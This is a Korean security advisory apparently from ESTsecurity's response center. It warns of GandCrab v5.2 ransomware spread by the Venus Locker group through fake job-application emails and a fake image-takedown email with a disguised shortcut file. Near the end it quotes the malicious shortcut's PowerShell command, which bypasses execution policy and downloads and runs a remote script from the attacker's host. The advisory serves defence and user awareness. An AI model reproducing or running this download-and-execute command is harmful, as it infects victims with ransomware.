[주의] 비너스락커 그룹 입사지원서를 위장하여 갠드크랩 v5.2 유포 중

안녕하세요. 이스트시큐리티 시큐리티대응센터(ESRC)입니다. 

금일(2019년 4월 8일) 입사지원서를 위장한 갠드크랩 v5.2을 새롭게 유포한 정황이 포착되어 사용자들의 주의가 필요합니다.

해당 악성 메일은 기존에 갠드크랩을 유포하던 비너스락커(Venus Locker) 그룹인 것으로 밝혀졌습니다.

 

[그림 1] 입사지원서를 위장한 악성 메일 이미지

금일 발견된 입사지원서 사칭 메일은 .egg 확장자의 알집 파일이 첨부되어 있는 것이 특징입니다.

첨부된 파일을 압축 해제하면 압축파일 내에는 그림과 같이 긴 공백을 포함하며, pdf 파일을 위장한 exe 실행파일과 증명서라는 jpg 그림파일이 들어있습니다. (메일 첨부파일마다 조금씩 상이할 수 있습니다.) 

[그림 2] 악성 파일 내용

공격자는 파일명에 긴 공백을 사용하여 exe 실행파일임을 숨기려 시도했습니다.

압축 파일 안의 파일명은 다음과 같습니다.

- 이력서.pdf(긴공백).exe

- 자격증.pdf(긴공백).exe

- 증명서.jpg

입사담당자가 해당 악성 파일을 pdf 파일로 착각하여 실행하면 다음과 같이 갠드크랩 v5.2에 감염됩니다.

이번에 발견된 랜섬웨어의 경우, 사용자 PC가 랜섬웨어에 감염되면 LHWDFTB-MANUAL.txt 랜섬노트를 바탕화면에 생성하며, 모든 파일은 .LHWDFTB 확장자가 붙은 암호화 파일로 변경됩니다.

[그림 3] 갠드크랩 감염 이미지

랜섬노트 내용을 보면, 파일을 복호화하고 싶다면 개인 키를 구입해야하며, 안내된 Tor 브라우저로 들어가 브라우저의 안내사항을 따르라고 되어 있습니다.

[그림 4] LHWDFTB 랜섬노트 이미지

또한, 하나의 파일은 무료로 복호화 해 주겠다며, 갠드크랩 키를 제시합니다.

ESRC에서는 랜섬노트 매뉴얼에 따라, 안내된 Tor 웹 페이지에서 무료로 파일 복호화가 가능한지 확인해 보았습니다.

랜섬노트의 내용에 따라 제시된 주소로 Tor 웹페이지를 사용해 접속하면 다음과 같은 갠드크랩 페이지가 팝업됩니다.

[그림 5] 갠드크랩 TOR 웹페이지 화면

갠드크랩 페이지를 확인해 보면 1300 USD 달러 지불 안내와 7일 이후에는 가격이 2배로 된다는 메시지가 포함되어 있습니다.

그리고 9.35925126 DSH(Dashcoin) 랜섬머니와 암호화폐 지갑 주소를 확인할 수 있습니다.

또한, 페이지 안에 Free decrypt 문구를 확인할 수 있으며, 다음와 같이 1개의 파일을 갠드크랩 페이지에 업로드하고 파일 복호화를 시도할 수 있습니다.

 

[그림 6] 갠드크랩 페이지를 통한 파일 복호화 시도 화면1

암호화된 파일을 업로드해 보면, 2MB 이하의 파일만 업로드 가능하다는 내용을 확인할 수 있습니다.

[그림 7] 갠드크랩 페이지를 통한 파일 복호화 시도 화면2

[그림 8] 갠드크랩 페이지를 통한 파일 복호화 시도 화면3

업로드한 파일을 다시 다운로드하면 다음과 같이 확장자가 .LHWDFTB에서 png로 변경된 것을 알 수 있습니다.

[그림 9] 갠드크랩 페이지를 통한 복호화된 파일

하지만 파일을 확인해 보면 레지스트리 값이 잘못 되었다는 팝업창이 뜨고, 실제 파일을 확인해 볼 수는 없었습니다.

[그림 10] 복호화된 파일의 레지스트리 값 에러 화면

랜섬노트의 매뉴얼에 따라, TOR 사이트에 중요 파일을 업로드하여 복호화 시도를 하더라도, 실제 파일이 제대로 복호화될 지 알 수 없으며, 위의 그림과 같이 파일을 확인하지 못하는 경우도 존재합니다.

채용 담당자분들께서는 출처가 불분명한 사용자에게서 온 이메일에 포함된 첨부파일 다운로드를 지양해 주시기 바라며, 파일을 실행하기 전에는 백신 프로그램을 이용하여 악성 여부를 확인해 주시기 바랍니다. 

※ 관련글 보기

[비너스락커(Venus Locker) 그룹]

▶ 국가 기관 및 기업 대상으로 랜섬웨어 다량 유포돼… 관계자 주의 필요 (2017.01.03)

▶ 교육 일정표 위장한 ‘한국 맞춤형’ 비너스락커 랜섬웨어 변종 국내 유포 중! (2017.02.17)

▶ ‘이젠 유명 단체 사칭에 한국어 상담까지’… 한국 맞춤형 랜섬웨어 피해 확산 중 (2017.02.23)

▶ 쇼핑몰에서 유출된 ‘고객 개인정보 리스트’ 사칭한 변종 랜섬웨어 유포 중 (2017.04.13)

▶ 글로벌 특송업체 ‘페덱스’ 배송팀을 사칭한 ‘오토크립터’ 한국형 랜섬웨어 확산! (2017.05.26)

▶ 'eFINE 교통범칙금 인터넷 납부'로 돌아온 비너스락커 주의! (2017.06.01)

▶ 한국어를 구사하는 랜섬웨어 유포자, 이젠 매크로 기반으로 갠드크랩 유포 중 (2018.05.15)

▶ 이미지 저작권 침해 내용 메일로 GandCrab 랜섬웨어 유포 주의 (2018.06.25)

▶ 비너스락커 조직이 유포중인 갠드크랩(GandCrab) v5.0.3 주의! (2018.10.22)

▶ 비너스락커 위협조직, 입사지원서로 위장해 갠드크랩 랜섬웨어 한국에 급속 유포 중 (2018.11.15)

▶ 비너스락커 랜섬웨어 조직, 베리즈 웹쉐어를 통해 갠드크랩 국내 다량 유포 (2018.11.19)

▶ 비너스락커 조직, 임금체불 관련 출석요구서로 사칭한 갠드크랩 랜섬웨어 감염 주의 (2018.11.20)

▶ 비너스락커 조직, 또 다시 이력서로 위장하여 갠드크랩 랜섬웨어 유포 중! (2018.11.27)

▶ 비너스락커 조직 ‘바로가기’ 파일(LNK) 변경하여 유포 중인 갠드크랩 랜섬웨어 주의 (2018.12.03)

▶ 비너스락커 랜섬웨어 조직, 한국 상대로 악성 문서파일 융단폭격 중 (2018.12.10)

▶ 또 다시 등장한 비너스락커 위협조직, 2018 연말정산 시즌 겨냥! (2018.12.13)

▶ 2018 연말정산 시즌 비너스락커 유포 조직 활동중! (2018.12.27)

▶ 입사지원서로 위장한 갠드크랩(GandCrab) 랜섬웨어 v5.1 유포중! (2019.01.21)

▶ [주의] 지방 경찰서 출석통지서로 사칭한 갠드크랩 다량 유포 중! (2019.02.12)

▶ 입사지원서로 위장한 갠드크랩(GandCrab) 랜섬웨어 v5.2 유포중! (2019.02.26)

또한, 주말 동안 '이미지 사용 중지 요청'의 디자이너를 사칭한 악성 메일도 발견되었습니다.

[그림 11] 디자이너 사칭 악성 메일 화면

해당 악성 메일의 첨부파일은 ,jpg.zip 파일로 이미지 파일인 것처럼 속이려 시도했는데, 실제 첨부파일 안의 내용을 확인하면 다음과 같은 lnk 파일을 확인하실 수 있습니다.

[그림 12] 압축 파일 안의 lnk 파일 화면

다운로드 받은 파일을 확인해 보면 ,jpg 확장자명으로 위장한 파일이 확인되며, 작게 바로가기 링크 표시가 있음을 확인하실 수 있습니다.

lnk 파일의 경우 윈도우에서 파일 확장명 보기를 설정하신다고 하더라도 lnk 확장자가 확인되지 않기 때문에, jpg 이미지 파일로 착각할 가능성이 높습니다.

[그림 13] jpg 그림 파일로 위장한 악성 lnk 파일 화면

해당 파일의 속성값을 확인해 보면 바로가기 항목에 다음과 같은 파워쉘 경로가 포함되어 있습니다.

[그림 14] 악성 lnk 파일 속성 값

악성 lnk 파일 속성값의 바로가기 경로는 다음과 같습니다.

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -Exec bypass -windo 1 $ms=[Text.Encoding]::UTF8.GetString([Convert]::FromBase64String('aWV4'));sal qr $ms;$Fb=((New-Object Net.WebClient)).DownloadString('http://bobbobb1z.com/a[.]ps1');qr $Fb

해당 경로의 파워쉘 링크('http://bobbobb1z.com/a[.]ps1') 내용을 확인해 보면 Base64로 인코딩된 실행파일 코드가 숨겨져 있습니다.

공격자는 인코딩된 코드를 쪼개, 백신에서 파일을 탐지하지 못하도록 조작하였습니다.

사용자가 다운로드한 악성파일을 jpg 파일로 착각하여 실행한다면 'http://bobbobb1z.com/a[.]ps1'에서 랜섬웨어 파일을 사용자 PC 공용폴더 (C:\Users\Public\)경로에 exe 실행파일을 다운로드하게 되고 랜섬웨어에 감염됩니다.

[그림 15] 랜섬웨어 파일 화면

웹 주소를 통해 악성 파일을 사용자 PC에 다운로드하는 프로세스가 처음 발견되었습니다.

이는 공격자가 랜섬웨어 유포 방식을 다양화하고 있다는 방증이며, 사용자들은 다양해진 랜섬웨어 공격으로부터 디지털 자산을 지키기 위해 주의를 기울이셔야 합니다.

알약에서는 해당 악성 샘플들에 대하여 Trojan.Ransom.GandCrab, Trojan.PowerShell.Agent으로 탐지 중에 있습니다.